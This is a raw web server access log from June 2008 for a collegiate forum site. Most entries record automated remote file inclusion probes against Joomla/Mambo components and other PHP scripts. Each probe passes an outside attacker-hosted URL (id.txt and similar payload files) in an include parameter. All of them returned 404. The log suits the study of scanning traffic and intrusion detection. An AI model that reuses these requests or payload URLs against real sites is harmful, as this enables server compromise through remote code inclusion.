89.108.68.56 - - [22/Jun/2008:17:46:48 -0700] "GET /logs/access_080121.log/index.php?menu=deti&page=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.223.106.116 - - [22/Jun/2008:17:48:12 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:49:06 -0700] "GET /send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:51:17 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:51:27 -0700] "GET /logs/access_080310.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:51:27 -0700] "GET //joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:51:31 -0700] "GET /logs//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:52:20 -0700] "GET /index.php?menu=deti&page=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:17:53:05 -0700] "GET /logs/access_080303.log//joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:54:28 -0700] "GET /logs/access_080324.log/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:54:28 -0700] "GET /[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:54:28 -0700] "GET /logs/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:55:34 -0700] "GET /logs/access.log/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:55:34 -0700] "GET /[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:55:35 -0700] "GET /logs/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:56:29 -0700] "GET /logs/access_080609.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:17:56:34 -0700] "GET /logs/access_080609.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.67.25.167 - - [22/Jun/2008:17:57:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
66.223.106.116 - - [22/Jun/2008:17:57:19 -0700] "GET /logs/access_071231.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.centrogassystem.com/frn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.67.25.167 - - [22/Jun/2008:17:57:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:59:42 -0700] "GET /logs/access_080107.log//components/com_forum/download.php?phpbb_root_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:59:42 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:59:43 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:59:49 -0700] "GET /logs/access_080107.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:59:49 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:17:59:49 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:02:10 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:02:34 -0700] "GET /[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:07:17 -0700] "GET /logs/access_080303.log/send_reminders.php?includedir=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:07:49 -0700] "GET /logs/access.log/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:07:50 -0700] "GET /[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:07:50 -0700] "GET /logs/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:18:08:54 -0700] "GET /logs/access.log/index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:18:08:55 -0700] "GET /index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:18:08:57 -0700] "GET /logs/index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:18:08:59 -0700] "GET /logs/access.log/index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:18:08:59 -0700] "GET /index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:18:08:59 -0700] "GET /logs/index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:18:10:50 -0700] "GET /logs/access_080609.log/index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:18:10:58 -0700] "GET /logs/access_080609.log/index.php?redir=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.6.22.153 - - [22/Jun/2008:18:11:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.22.153 - - [22/Jun/2008:18:11:28 -0700] "GET /logs/access_080324.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:15:03 -0700] "GET /logs/access.log/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:15:03 -0700] "GET /[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:15:04 -0700] "GET /logs/[Scripthttp://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.191.40.213 - - [22/Jun/2008:18:19:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://webhosting.i2.co.id/mestre101/list.jpg?.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
64.191.40.213 - - [22/Jun/2008:18:19:21 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://busca.uol.com.br/uol/index.html? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:10 -0700] "GET /Jonathan_Fantini_Porter/ HTTP/1.0" 200 23858 "http://www.collegiateforum.org/Jonathan_Fantini_Porter/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:14 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:20 -0700] "GET /staff HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:20 -0700] "GET /staff/collegiateforum HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff/collegiateforum" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:21 -0700] "GET /collegiateforum HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforum" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:21 -0700] "GET /staff/collegiateforum/executiveboard HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff/collegiateforum/executiveboard" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:21 -0700] "GET /collegiateforum/executiveboard HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforum/executiveboard" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:23 -0700] "GET /staff/collegiateforum/executiveboard/president.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff/collegiateforum/executiveboard/president.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:24 -0700] "GET /collegiateforum/executiveboard/president.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforum/executiveboard/president.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:24 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:27 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:28 -0700] "GET /index.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/index.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:31 -0700] "GET /collegiateforumfund.php HTTP/1.0" 404 275 "http://www.collegiateforum.org/collegiateforumfund.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
193.46.236.234 - - [22/Jun/2008:18:23:32 -0700] "GET /feed.xml HTTP/1.0" 404 275 "http://www.collegiateforum.org/feed.xml" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "www.collegiateforum.org"
89.108.68.56 - - [22/Jun/2008:18:24:37 -0700] "GET /logs/access_080324.log//components/com_forum/download.php?phpbb_root_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:18:26:10 -0700] "GET /logs/access_080324.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:18:26:11 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:18:26:12 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
59.188.5.164 - - [22/Jun/2008:18:28:11 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:18:31:25 -0700] "GET /logs/access_080609.log/errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:18:31:25 -0700] "GET /logs/access_080609.log/errors.php?error=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:18:31:30 -0700] "GET /logs/errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:18:31:36 -0700] "GET /logs/errors.php?error=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:18:32:53 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.collegiateforum.org"
195.12.53.176 - - [22/Jun/2008:18:32:53 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.collegiateforum.org"
64.34.164.227 - - [22/Jun/2008:18:35:56 -0700] "GET /index.php?path=http://membres.lycos.fr/youyoussniper/scaner/ishi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
65.55.210.225 - - [22/Jun/2008:18:36:06 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.210.225 - - [22/Jun/2008:18:36:06 -0700] "GET /logs/?S=A HTTP/1.1" 200 4942 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
74.200.207.18 - - [22/Jun/2008:18:36:08 -0700] "GET /logs/access_080121.log/index.php?themesdir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.207.18 - - [22/Jun/2008:18:36:08 -0700] "GET /index.php?themesdir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.207.18 - - [22/Jun/2008:18:36:08 -0700] "GET /logs/index.php?themesdir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.203.122.236 - - [22/Jun/2008:18:38:52 -0700] "GET /logs/access_080121.log/menu.php?content=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.203.122.236 - - [22/Jun/2008:18:38:53 -0700] "GET /menu.php?content=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.203.122.236 - - [22/Jun/2008:18:38:53 -0700] "GET /logs/menu.php?content=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.76.36.41 - - [22/Jun/2008:18:39:44 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "www.collegiateforum.org"
72.9.228.149 - - [22/Jun/2008:18:42:05 -0700] "GET /logs/access.log/index1.php?menu=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
72.9.228.149 - - [22/Jun/2008:18:42:05 -0700] "GET /index1.php?menu=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
72.9.228.149 - - [22/Jun/2008:18:42:05 -0700] "GET /logs/index1.php?menu=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:18:47:42 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:18:47:43 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:18:47:43 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.9.228.149 - - [22/Jun/2008:18:48:34 -0700] "GET /logs/access_080414.log/index1.php?menu=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:18:50:26 -0700] "GET /logs/access.log/errors.php?error=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:18:50:26 -0700] "GET /errors.php?error=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:18:50:26 -0700] "GET /logs/errors.php?error=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
80.86.92.124 - - [22/Jun/2008:18:53:49 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
80.86.92.124 - - [22/Jun/2008:18:53:49 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
80.86.92.124 - - [22/Jun/2008:18:53:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
85.25.142.64 - - [22/Jun/2008:18:53:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.25.142.64 - - [22/Jun/2008:18:54:00 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.178.42 - - [22/Jun/2008:18:54:06 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.178.42 - - [22/Jun/2008:18:54:06 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.25.142.64 - - [22/Jun/2008:18:54:07 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.143.195 - - [22/Jun/2008:18:54:08 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.143.195 - - [22/Jun/2008:18:54:08 -0700] "GET /logs//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.178.42 - - [22/Jun/2008:18:54:10 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.143.195 - - [22/Jun/2008:18:54:25 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:18:55:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:18:55:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.86.92.124 - - [22/Jun/2008:18:55:25 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
85.25.142.64 - - [22/Jun/2008:18:55:53 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.143.195 - - [22/Jun/2008:18:55:57 -0700] "GET /logs/access_080421.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:18:57:46 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
89.108.91.166 - - [22/Jun/2008:18:57:46 -0700] "GET //ashnews.php?pathtoashnews=http://dj.caucasus.net/iddosi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
